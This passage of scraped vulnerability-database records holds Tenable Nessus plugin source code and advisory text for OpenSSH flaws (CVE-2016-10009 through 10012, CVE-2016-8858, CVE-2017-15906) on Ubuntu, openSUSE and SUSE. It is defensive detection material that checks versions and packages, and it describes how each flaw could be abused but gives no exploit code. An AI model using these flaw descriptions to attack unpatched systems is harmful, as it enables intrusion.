script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:openbsd:openssh\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/ssh\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"backport.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Ensure the port is open.\nport = get_service(svc:\"ssh\", exit_on_fail:TRUE);\n\n# Get banner for service.\nbanner = get_kb_item_or_exit(\"SSH/banner/\" + port);\n\nbp_banner = tolower(get_backport_banner(banner:banner));\nif (\"openssh\" >!< bp_banner)\n audit(AUDIT_NOT_LISTEN, \"OpenSSH\", port);\nif (report_paranoia < 2)\n audit(AUDIT_PARANOID);\nif (backported)\n audit(code:0, AUDIT_BACKPORT_SERVICE, port, \"OpenSSH\");\n\n# Check the version in the backported banner.\nmatch = eregmatch(string:bp_banner, pattern:\"openssh[-_]([0-9][-._0-9a-z]+)\");\nif (isnull(match))\n audit(AUDIT_SERVICE_VER_FAIL, \"OpenSSH\", port);\nversion = match[1];\n\nfix = \"7.4\";\nif (\n version =~ \"^[0-6]\\.\" ||\n version =~ \"^7\\.[0-3]\"\n )\n{\n items = make_array(\"Version source\", banner,\n \"Installed version\", version,\n \"Fixed version\", fix);\n order = make_list(\"Version source\", \"Installed version\", \"Fixed version\");\n report = report_items_str(report_items:items, ordered_fields:order);\n\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n exit(0);\n\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"OpenSSH\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T06:46:37", "description": "Jann Horn discovered that OpenSSH incorrectly loaded PKCS#11 modules\nfrom untrusted directories. A remote attacker could possibly use this\nissue to execute arbitrary PKCS#11 modules. This issue only affected\nUbuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2016-10009)\n\nJann Horn discovered that OpenSSH incorrectly handled permissions on\nUnix-domain sockets when privilege separation is disabled. A local\nattacker could possibly use this issue to gain privileges. This issue\nonly affected Ubuntu 16.04 LTS. (CVE-2016-10010)\n\nJann Horn discovered that OpenSSH incorrectly handled certain buffer\nmemory operations. A local attacker could possibly use this issue to\nobtain sensitive information. This issue only affected Ubuntu 14.04\nLTS and Ubuntu 16.04 LTS. (CVE-2016-10011)\n\nGuido Vranken discovered that OpenSSH incorrectly handled certain\nshared memory manager operations. A local attacker could possibly use\nissue to gain privileges. This issue only affected Ubuntu 14.04 LTS\nand Ubuntu 16.04 LTS. This issue only affected Ubuntu 14.04 LTS and\nUbuntu 16.04 LTS. (CVE-2016-10012)\n\nMichal Zalewski discovered that OpenSSH incorrectly prevented write\noperations in readonly mode. A remote attacker could possibly use this\nissue to create zero-length files, leading to a denial of service.\n(CVE-2017-15906).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-01-23T00:00:00", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 17.10 : openssh vulnerabilities (USN-3538-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-10010", "CVE-2017-15906", "CVE-2016-10012"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:17.10", "p-cpe:/a:canonical:ubuntu_linux:openssh-server", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3538-1.NASL", "href": "https://www.tenable.com/plugins/nessus/106266", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3538-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106266);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2019/09/18 12:31:47\");\n\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10010\", \"CVE-2016-10011\", \"CVE-2016-10012\", \"CVE-2017-15906\");\n script_xref(name:\"USN\", value:\"3538-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 17.10 : openssh vulnerabilities (USN-3538-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jann Horn discovered that OpenSSH incorrectly loaded PKCS#11 modules\nfrom untrusted directories. A remote attacker could possibly use this\nissue to execute arbitrary PKCS#11 modules. This issue only affected\nUbuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2016-10009)\n\nJann Horn discovered that OpenSSH incorrectly handled permissions on\nUnix-domain sockets when privilege separation is disabled. A local\nattacker could possibly use this issue to gain privileges. This issue\nonly affected Ubuntu 16.04 LTS. (CVE-2016-10010)\n\nJann Horn discovered that OpenSSH incorrectly handled certain buffer\nmemory operations. A local attacker could possibly use this issue to\nobtain sensitive information. This issue only affected Ubuntu 14.04\nLTS and Ubuntu 16.04 LTS. (CVE-2016-10011)\n\nGuido Vranken discovered that OpenSSH incorrectly handled certain\nshared memory manager operations. A local attacker could possibly use\nissue to gain privileges. This issue only affected Ubuntu 14.04 LTS\nand Ubuntu 16.04 LTS. This issue only affected Ubuntu 14.04 LTS and\nUbuntu 16.04 LTS. (CVE-2016-10012)\n\nMichal Zalewski discovered that OpenSSH incorrectly prevented write\noperations in readonly mode. A remote attacker could possibly use this\nissue to create zero-length files, leading to a denial of service.\n(CVE-2017-15906).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3538-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh-server package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2019 Canonical, Inc. / NASL script (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|16\\.04|17\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04 / 17.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"openssh-server\", pkgver:\"1:6.6p1-2ubuntu2.10\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"openssh-server\", pkgver:\"1:7.2p2-4ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"openssh-server\", pkgver:\"1:7.5p1-10ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh-server\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T16:36:38", "description": "This update for openssh fixes several issues.\n\nThese security issues were fixed :\n\n - CVE-2016-8858: The kex_input_kexinit function in kex.c\n allowed remote attackers to cause a denial of service\n (memory consumption) by sending many duplicate KEXINIT\n requests (bsc#1005480).\n\n - CVE-2016-10012: The shared memory manager (associated\n with pre-authentication compression) did not ensure that\n a bounds check is enforced by all compilers, which might\n allowed local users to gain privileges by leveraging\n access to a sandboxed privilege-separation process,\n related to the m_zback and m_zlib data structures\n (bsc#1016370).\n\n - CVE-2016-10009: Untrusted search path vulnerability in\n ssh-agent.c allowed remote attackers to execute\n arbitrary local PKCS#11 modules by leveraging control\n over a forwarded agent-socket (bsc#1016366).\n\n - CVE-2016-10010: When forwarding unix domain sockets with\n privilege separation disabled, the resulting sockets\n have be created as 'root' instead of the authenticated\n user. Forwarding unix domain sockets without privilege\n separation enabled is now rejected.\n\n - CVE-2016-10011: authfile.c in sshd did not properly\n consider the effects of realloc on buffer contents,\n which might allowed local users to obtain sensitive\n private-key information by leveraging access to a\n privilege-separated child process (bsc#1016369).\n\nThese non-security issues were fixed :\n\n - Adjusted suggested command for removing conflicting\n server keys from the known_hosts file (bsc#1006221)\n\n - Properly verify CIDR masks in configuration (bsc#1005893\n bsc#1021626)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.", "edition": 17, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-02-01T00:00:00", "title": "openSUSE Security Update : openssh (openSUSE-2017-184)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10012", "CVE-2016-8858"], "modified": "2017-02-01T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:openssh-askpass-gnome-debuginfo", "p-cpe:/a:novell:opensuse:openssh-askpass-gnome", "p-cpe:/a:novell:opensuse:openssh-debuginfo", "p-cpe:/a:novell:opensuse:openssh", "p-cpe:/a:novell:opensuse:openssh-debugsource", "p-cpe:/a:novell:opensuse:openssh-helpers", "p-cpe:/a:novell:opensuse:openssh-cavs", "p-cpe:/a:novell:opensuse:openssh-helpers-debuginfo", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:openssh-fips"], "id": "OPENSUSE-2017-184.NASL", "href": "https://www.tenable.com/plugins/nessus/96919", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-184.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96919);\n script_version(\"3.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10010\", \"CVE-2016-10011\", \"CVE-2016-10012\", \"CVE-2016-8858\");\n\n script_name(english:\"openSUSE Security Update : openssh (openSUSE-2017-184)\");\n script_summary(english:\"Check for the openSUSE-2017-184 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for openssh fixes several issues.\n\nThese security issues were fixed :\n\n - CVE-2016-8858: The kex_input_kexinit function in kex.c\n allowed remote attackers to cause a denial of service\n (memory consumption) by sending many duplicate KEXINIT\n requests (bsc#1005480).\n\n - CVE-2016-10012: The shared memory manager (associated\n with pre-authentication compression) did not ensure that\n a bounds check is enforced by all compilers, which might\n allowed local users to gain privileges by leveraging\n access to a sandboxed privilege-separation process,\n related to the m_zback and m_zlib data structures\n (bsc#1016370).\n\n - CVE-2016-10009: Untrusted search path vulnerability in\n ssh-agent.c allowed remote attackers to execute\n arbitrary local PKCS#11 modules by leveraging control\n over a forwarded agent-socket (bsc#1016366).\n\n - CVE-2016-10010: When forwarding unix domain sockets with\n privilege separation disabled, the resulting sockets\n have be created as 'root' instead of the authenticated\n user. Forwarding unix domain sockets without privilege\n separation enabled is now rejected.\n\n - CVE-2016-10011: authfile.c in sshd did not properly\n consider the effects of realloc on buffer contents,\n which might allowed local users to obtain sensitive\n private-key information by leveraging access to a\n privilege-separated child process (bsc#1016369).\n\nThese non-security issues were fixed :\n\n - Adjusted suggested command for removing conflicting\n server keys from the known_hosts file (bsc#1006221)\n\n - Properly verify CIDR masks in configuration (bsc#1005893\n bsc#1021626)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1005480\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1005893\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1006221\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1016366\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1016368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1016369\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1016370\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1021626\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-askpass-gnome-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-cavs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-fips\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-helpers-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"openssh-7.2p2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"openssh-askpass-gnome-7.2p2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"openssh-askpass-gnome-debuginfo-7.2p2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"openssh-cavs-7.2p2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"openssh-debuginfo-7.2p2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"openssh-debugsource-7.2p2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"openssh-fips-7.2p2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"openssh-helpers-7.2p2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"openssh-helpers-debuginfo-7.2p2-9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh-askpass-gnome / openssh-askpass-gnome-debuginfo / openssh / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-07T14:25:21", "description": "This update for openssh fixes several issues. These security issues\nwere fixed :\n\n - CVE-2016-8858: The kex_input_kexinit function in kex.c\n allowed remote attackers to cause a denial of service\n (memory consumption) by sending many duplicate KEXINIT\n requests (bsc#1005480).\n\n - CVE-2016-10012: The shared memory manager (associated\n with pre-authentication compression) did not ensure that\n a bounds check is enforced by all compilers, which might\n allowed local users to gain privileges by leveraging\n access to a sandboxed privilege-separation process,\n related to the m_zback and m_zlib data structures\n (bsc#1016370).\n\n - CVE-2016-10009: Untrusted search path vulnerability in\n ssh-agent.c allowed remote attackers to execute\n arbitrary local PKCS#11 modules by leveraging control\n over a forwarded agent-socket (bsc#1016366).\n\n - CVE-2016-10010: When forwarding unix domain sockets with\n privilege separation disabled, the resulting sockets\n have be created as 'root' instead of the authenticated\n user. Forwarding unix domain sockets without privilege\n separation enabled is now rejected.\n\n - CVE-2016-10011: authfile.c in sshd did not properly\n consider the effects of realloc on buffer contents,\n which might allowed local users to obtain sensitive\n private-key information by leveraging access to a\n privilege-separated child process (bsc#1016369).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-01-24T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : openssh (SUSE-SU-2017:0264-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10012", "CVE-2016-8858"], "modified": "2017-01-24T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:openssh", "p-cpe:/a:novell:suse_linux:openssh-askpass-gnome", "p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-helpers", "p-cpe:/a:novell:suse_linux:openssh-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-fips", "p-cpe:/a:novell:suse_linux:openssh-debugsource"], "id": "SUSE_SU-2017-0264-1.NASL", "href": "https://www.tenable.com/plugins/nessus/96718", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:0264-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96718);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10010\", \"CVE-2016-10011\", \"CVE-2016-10012\", \"CVE-2016-8858\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : openssh (SUSE-SU-2017:0264-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for openssh fixes several issues. These security issues\nwere fixed :\n\n - CVE-2016-8858: The kex_input_kexinit function in kex.c\n allowed remote attackers to cause a denial of service\n (memory consumption) by sending many duplicate KEXINIT\n requests (bsc#1005480).\n\n - CVE-2016-10012: The shared memory manager (associated\n with pre-authentication compression) did not ensure that\n a bounds check is enforced by all compilers, which might\n allowed local users to gain privileges by leveraging\n access to a sandboxed privilege-separation process,\n related to the m_zback and m_zlib data structures\n (bsc#1016370).\n\n - CVE-2016-10009: Untrusted search path vulnerability in\n ssh-agent.c allowed remote attackers to execute\n arbitrary local PKCS#11 modules by leveraging control\n over a forwarded agent-socket (bsc#1016366).\n\n - CVE-2016-10010: When forwarding unix domain sockets with\n privilege separation disabled, the resulting sockets\n have be created as 'root' instead of the authenticated\n user. Forwarding unix domain sockets without privilege\n separation enabled is now rejected.\n\n - CVE-2016-10011: authfile.c in sshd did not properly\n consider the effects of realloc on buffer contents,\n which might allowed local users to obtain sensitive\n private-key information by leveraging access to a\n privilege-separated child process (bsc#1016369).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1005480\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1005893\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1006221\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1016366\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1016368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1016369\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1016370\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10009/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10010/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10011/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10012/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-8858/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20170264-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bec09483\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2017-138=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2017-138=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2017-138=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-fips\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security 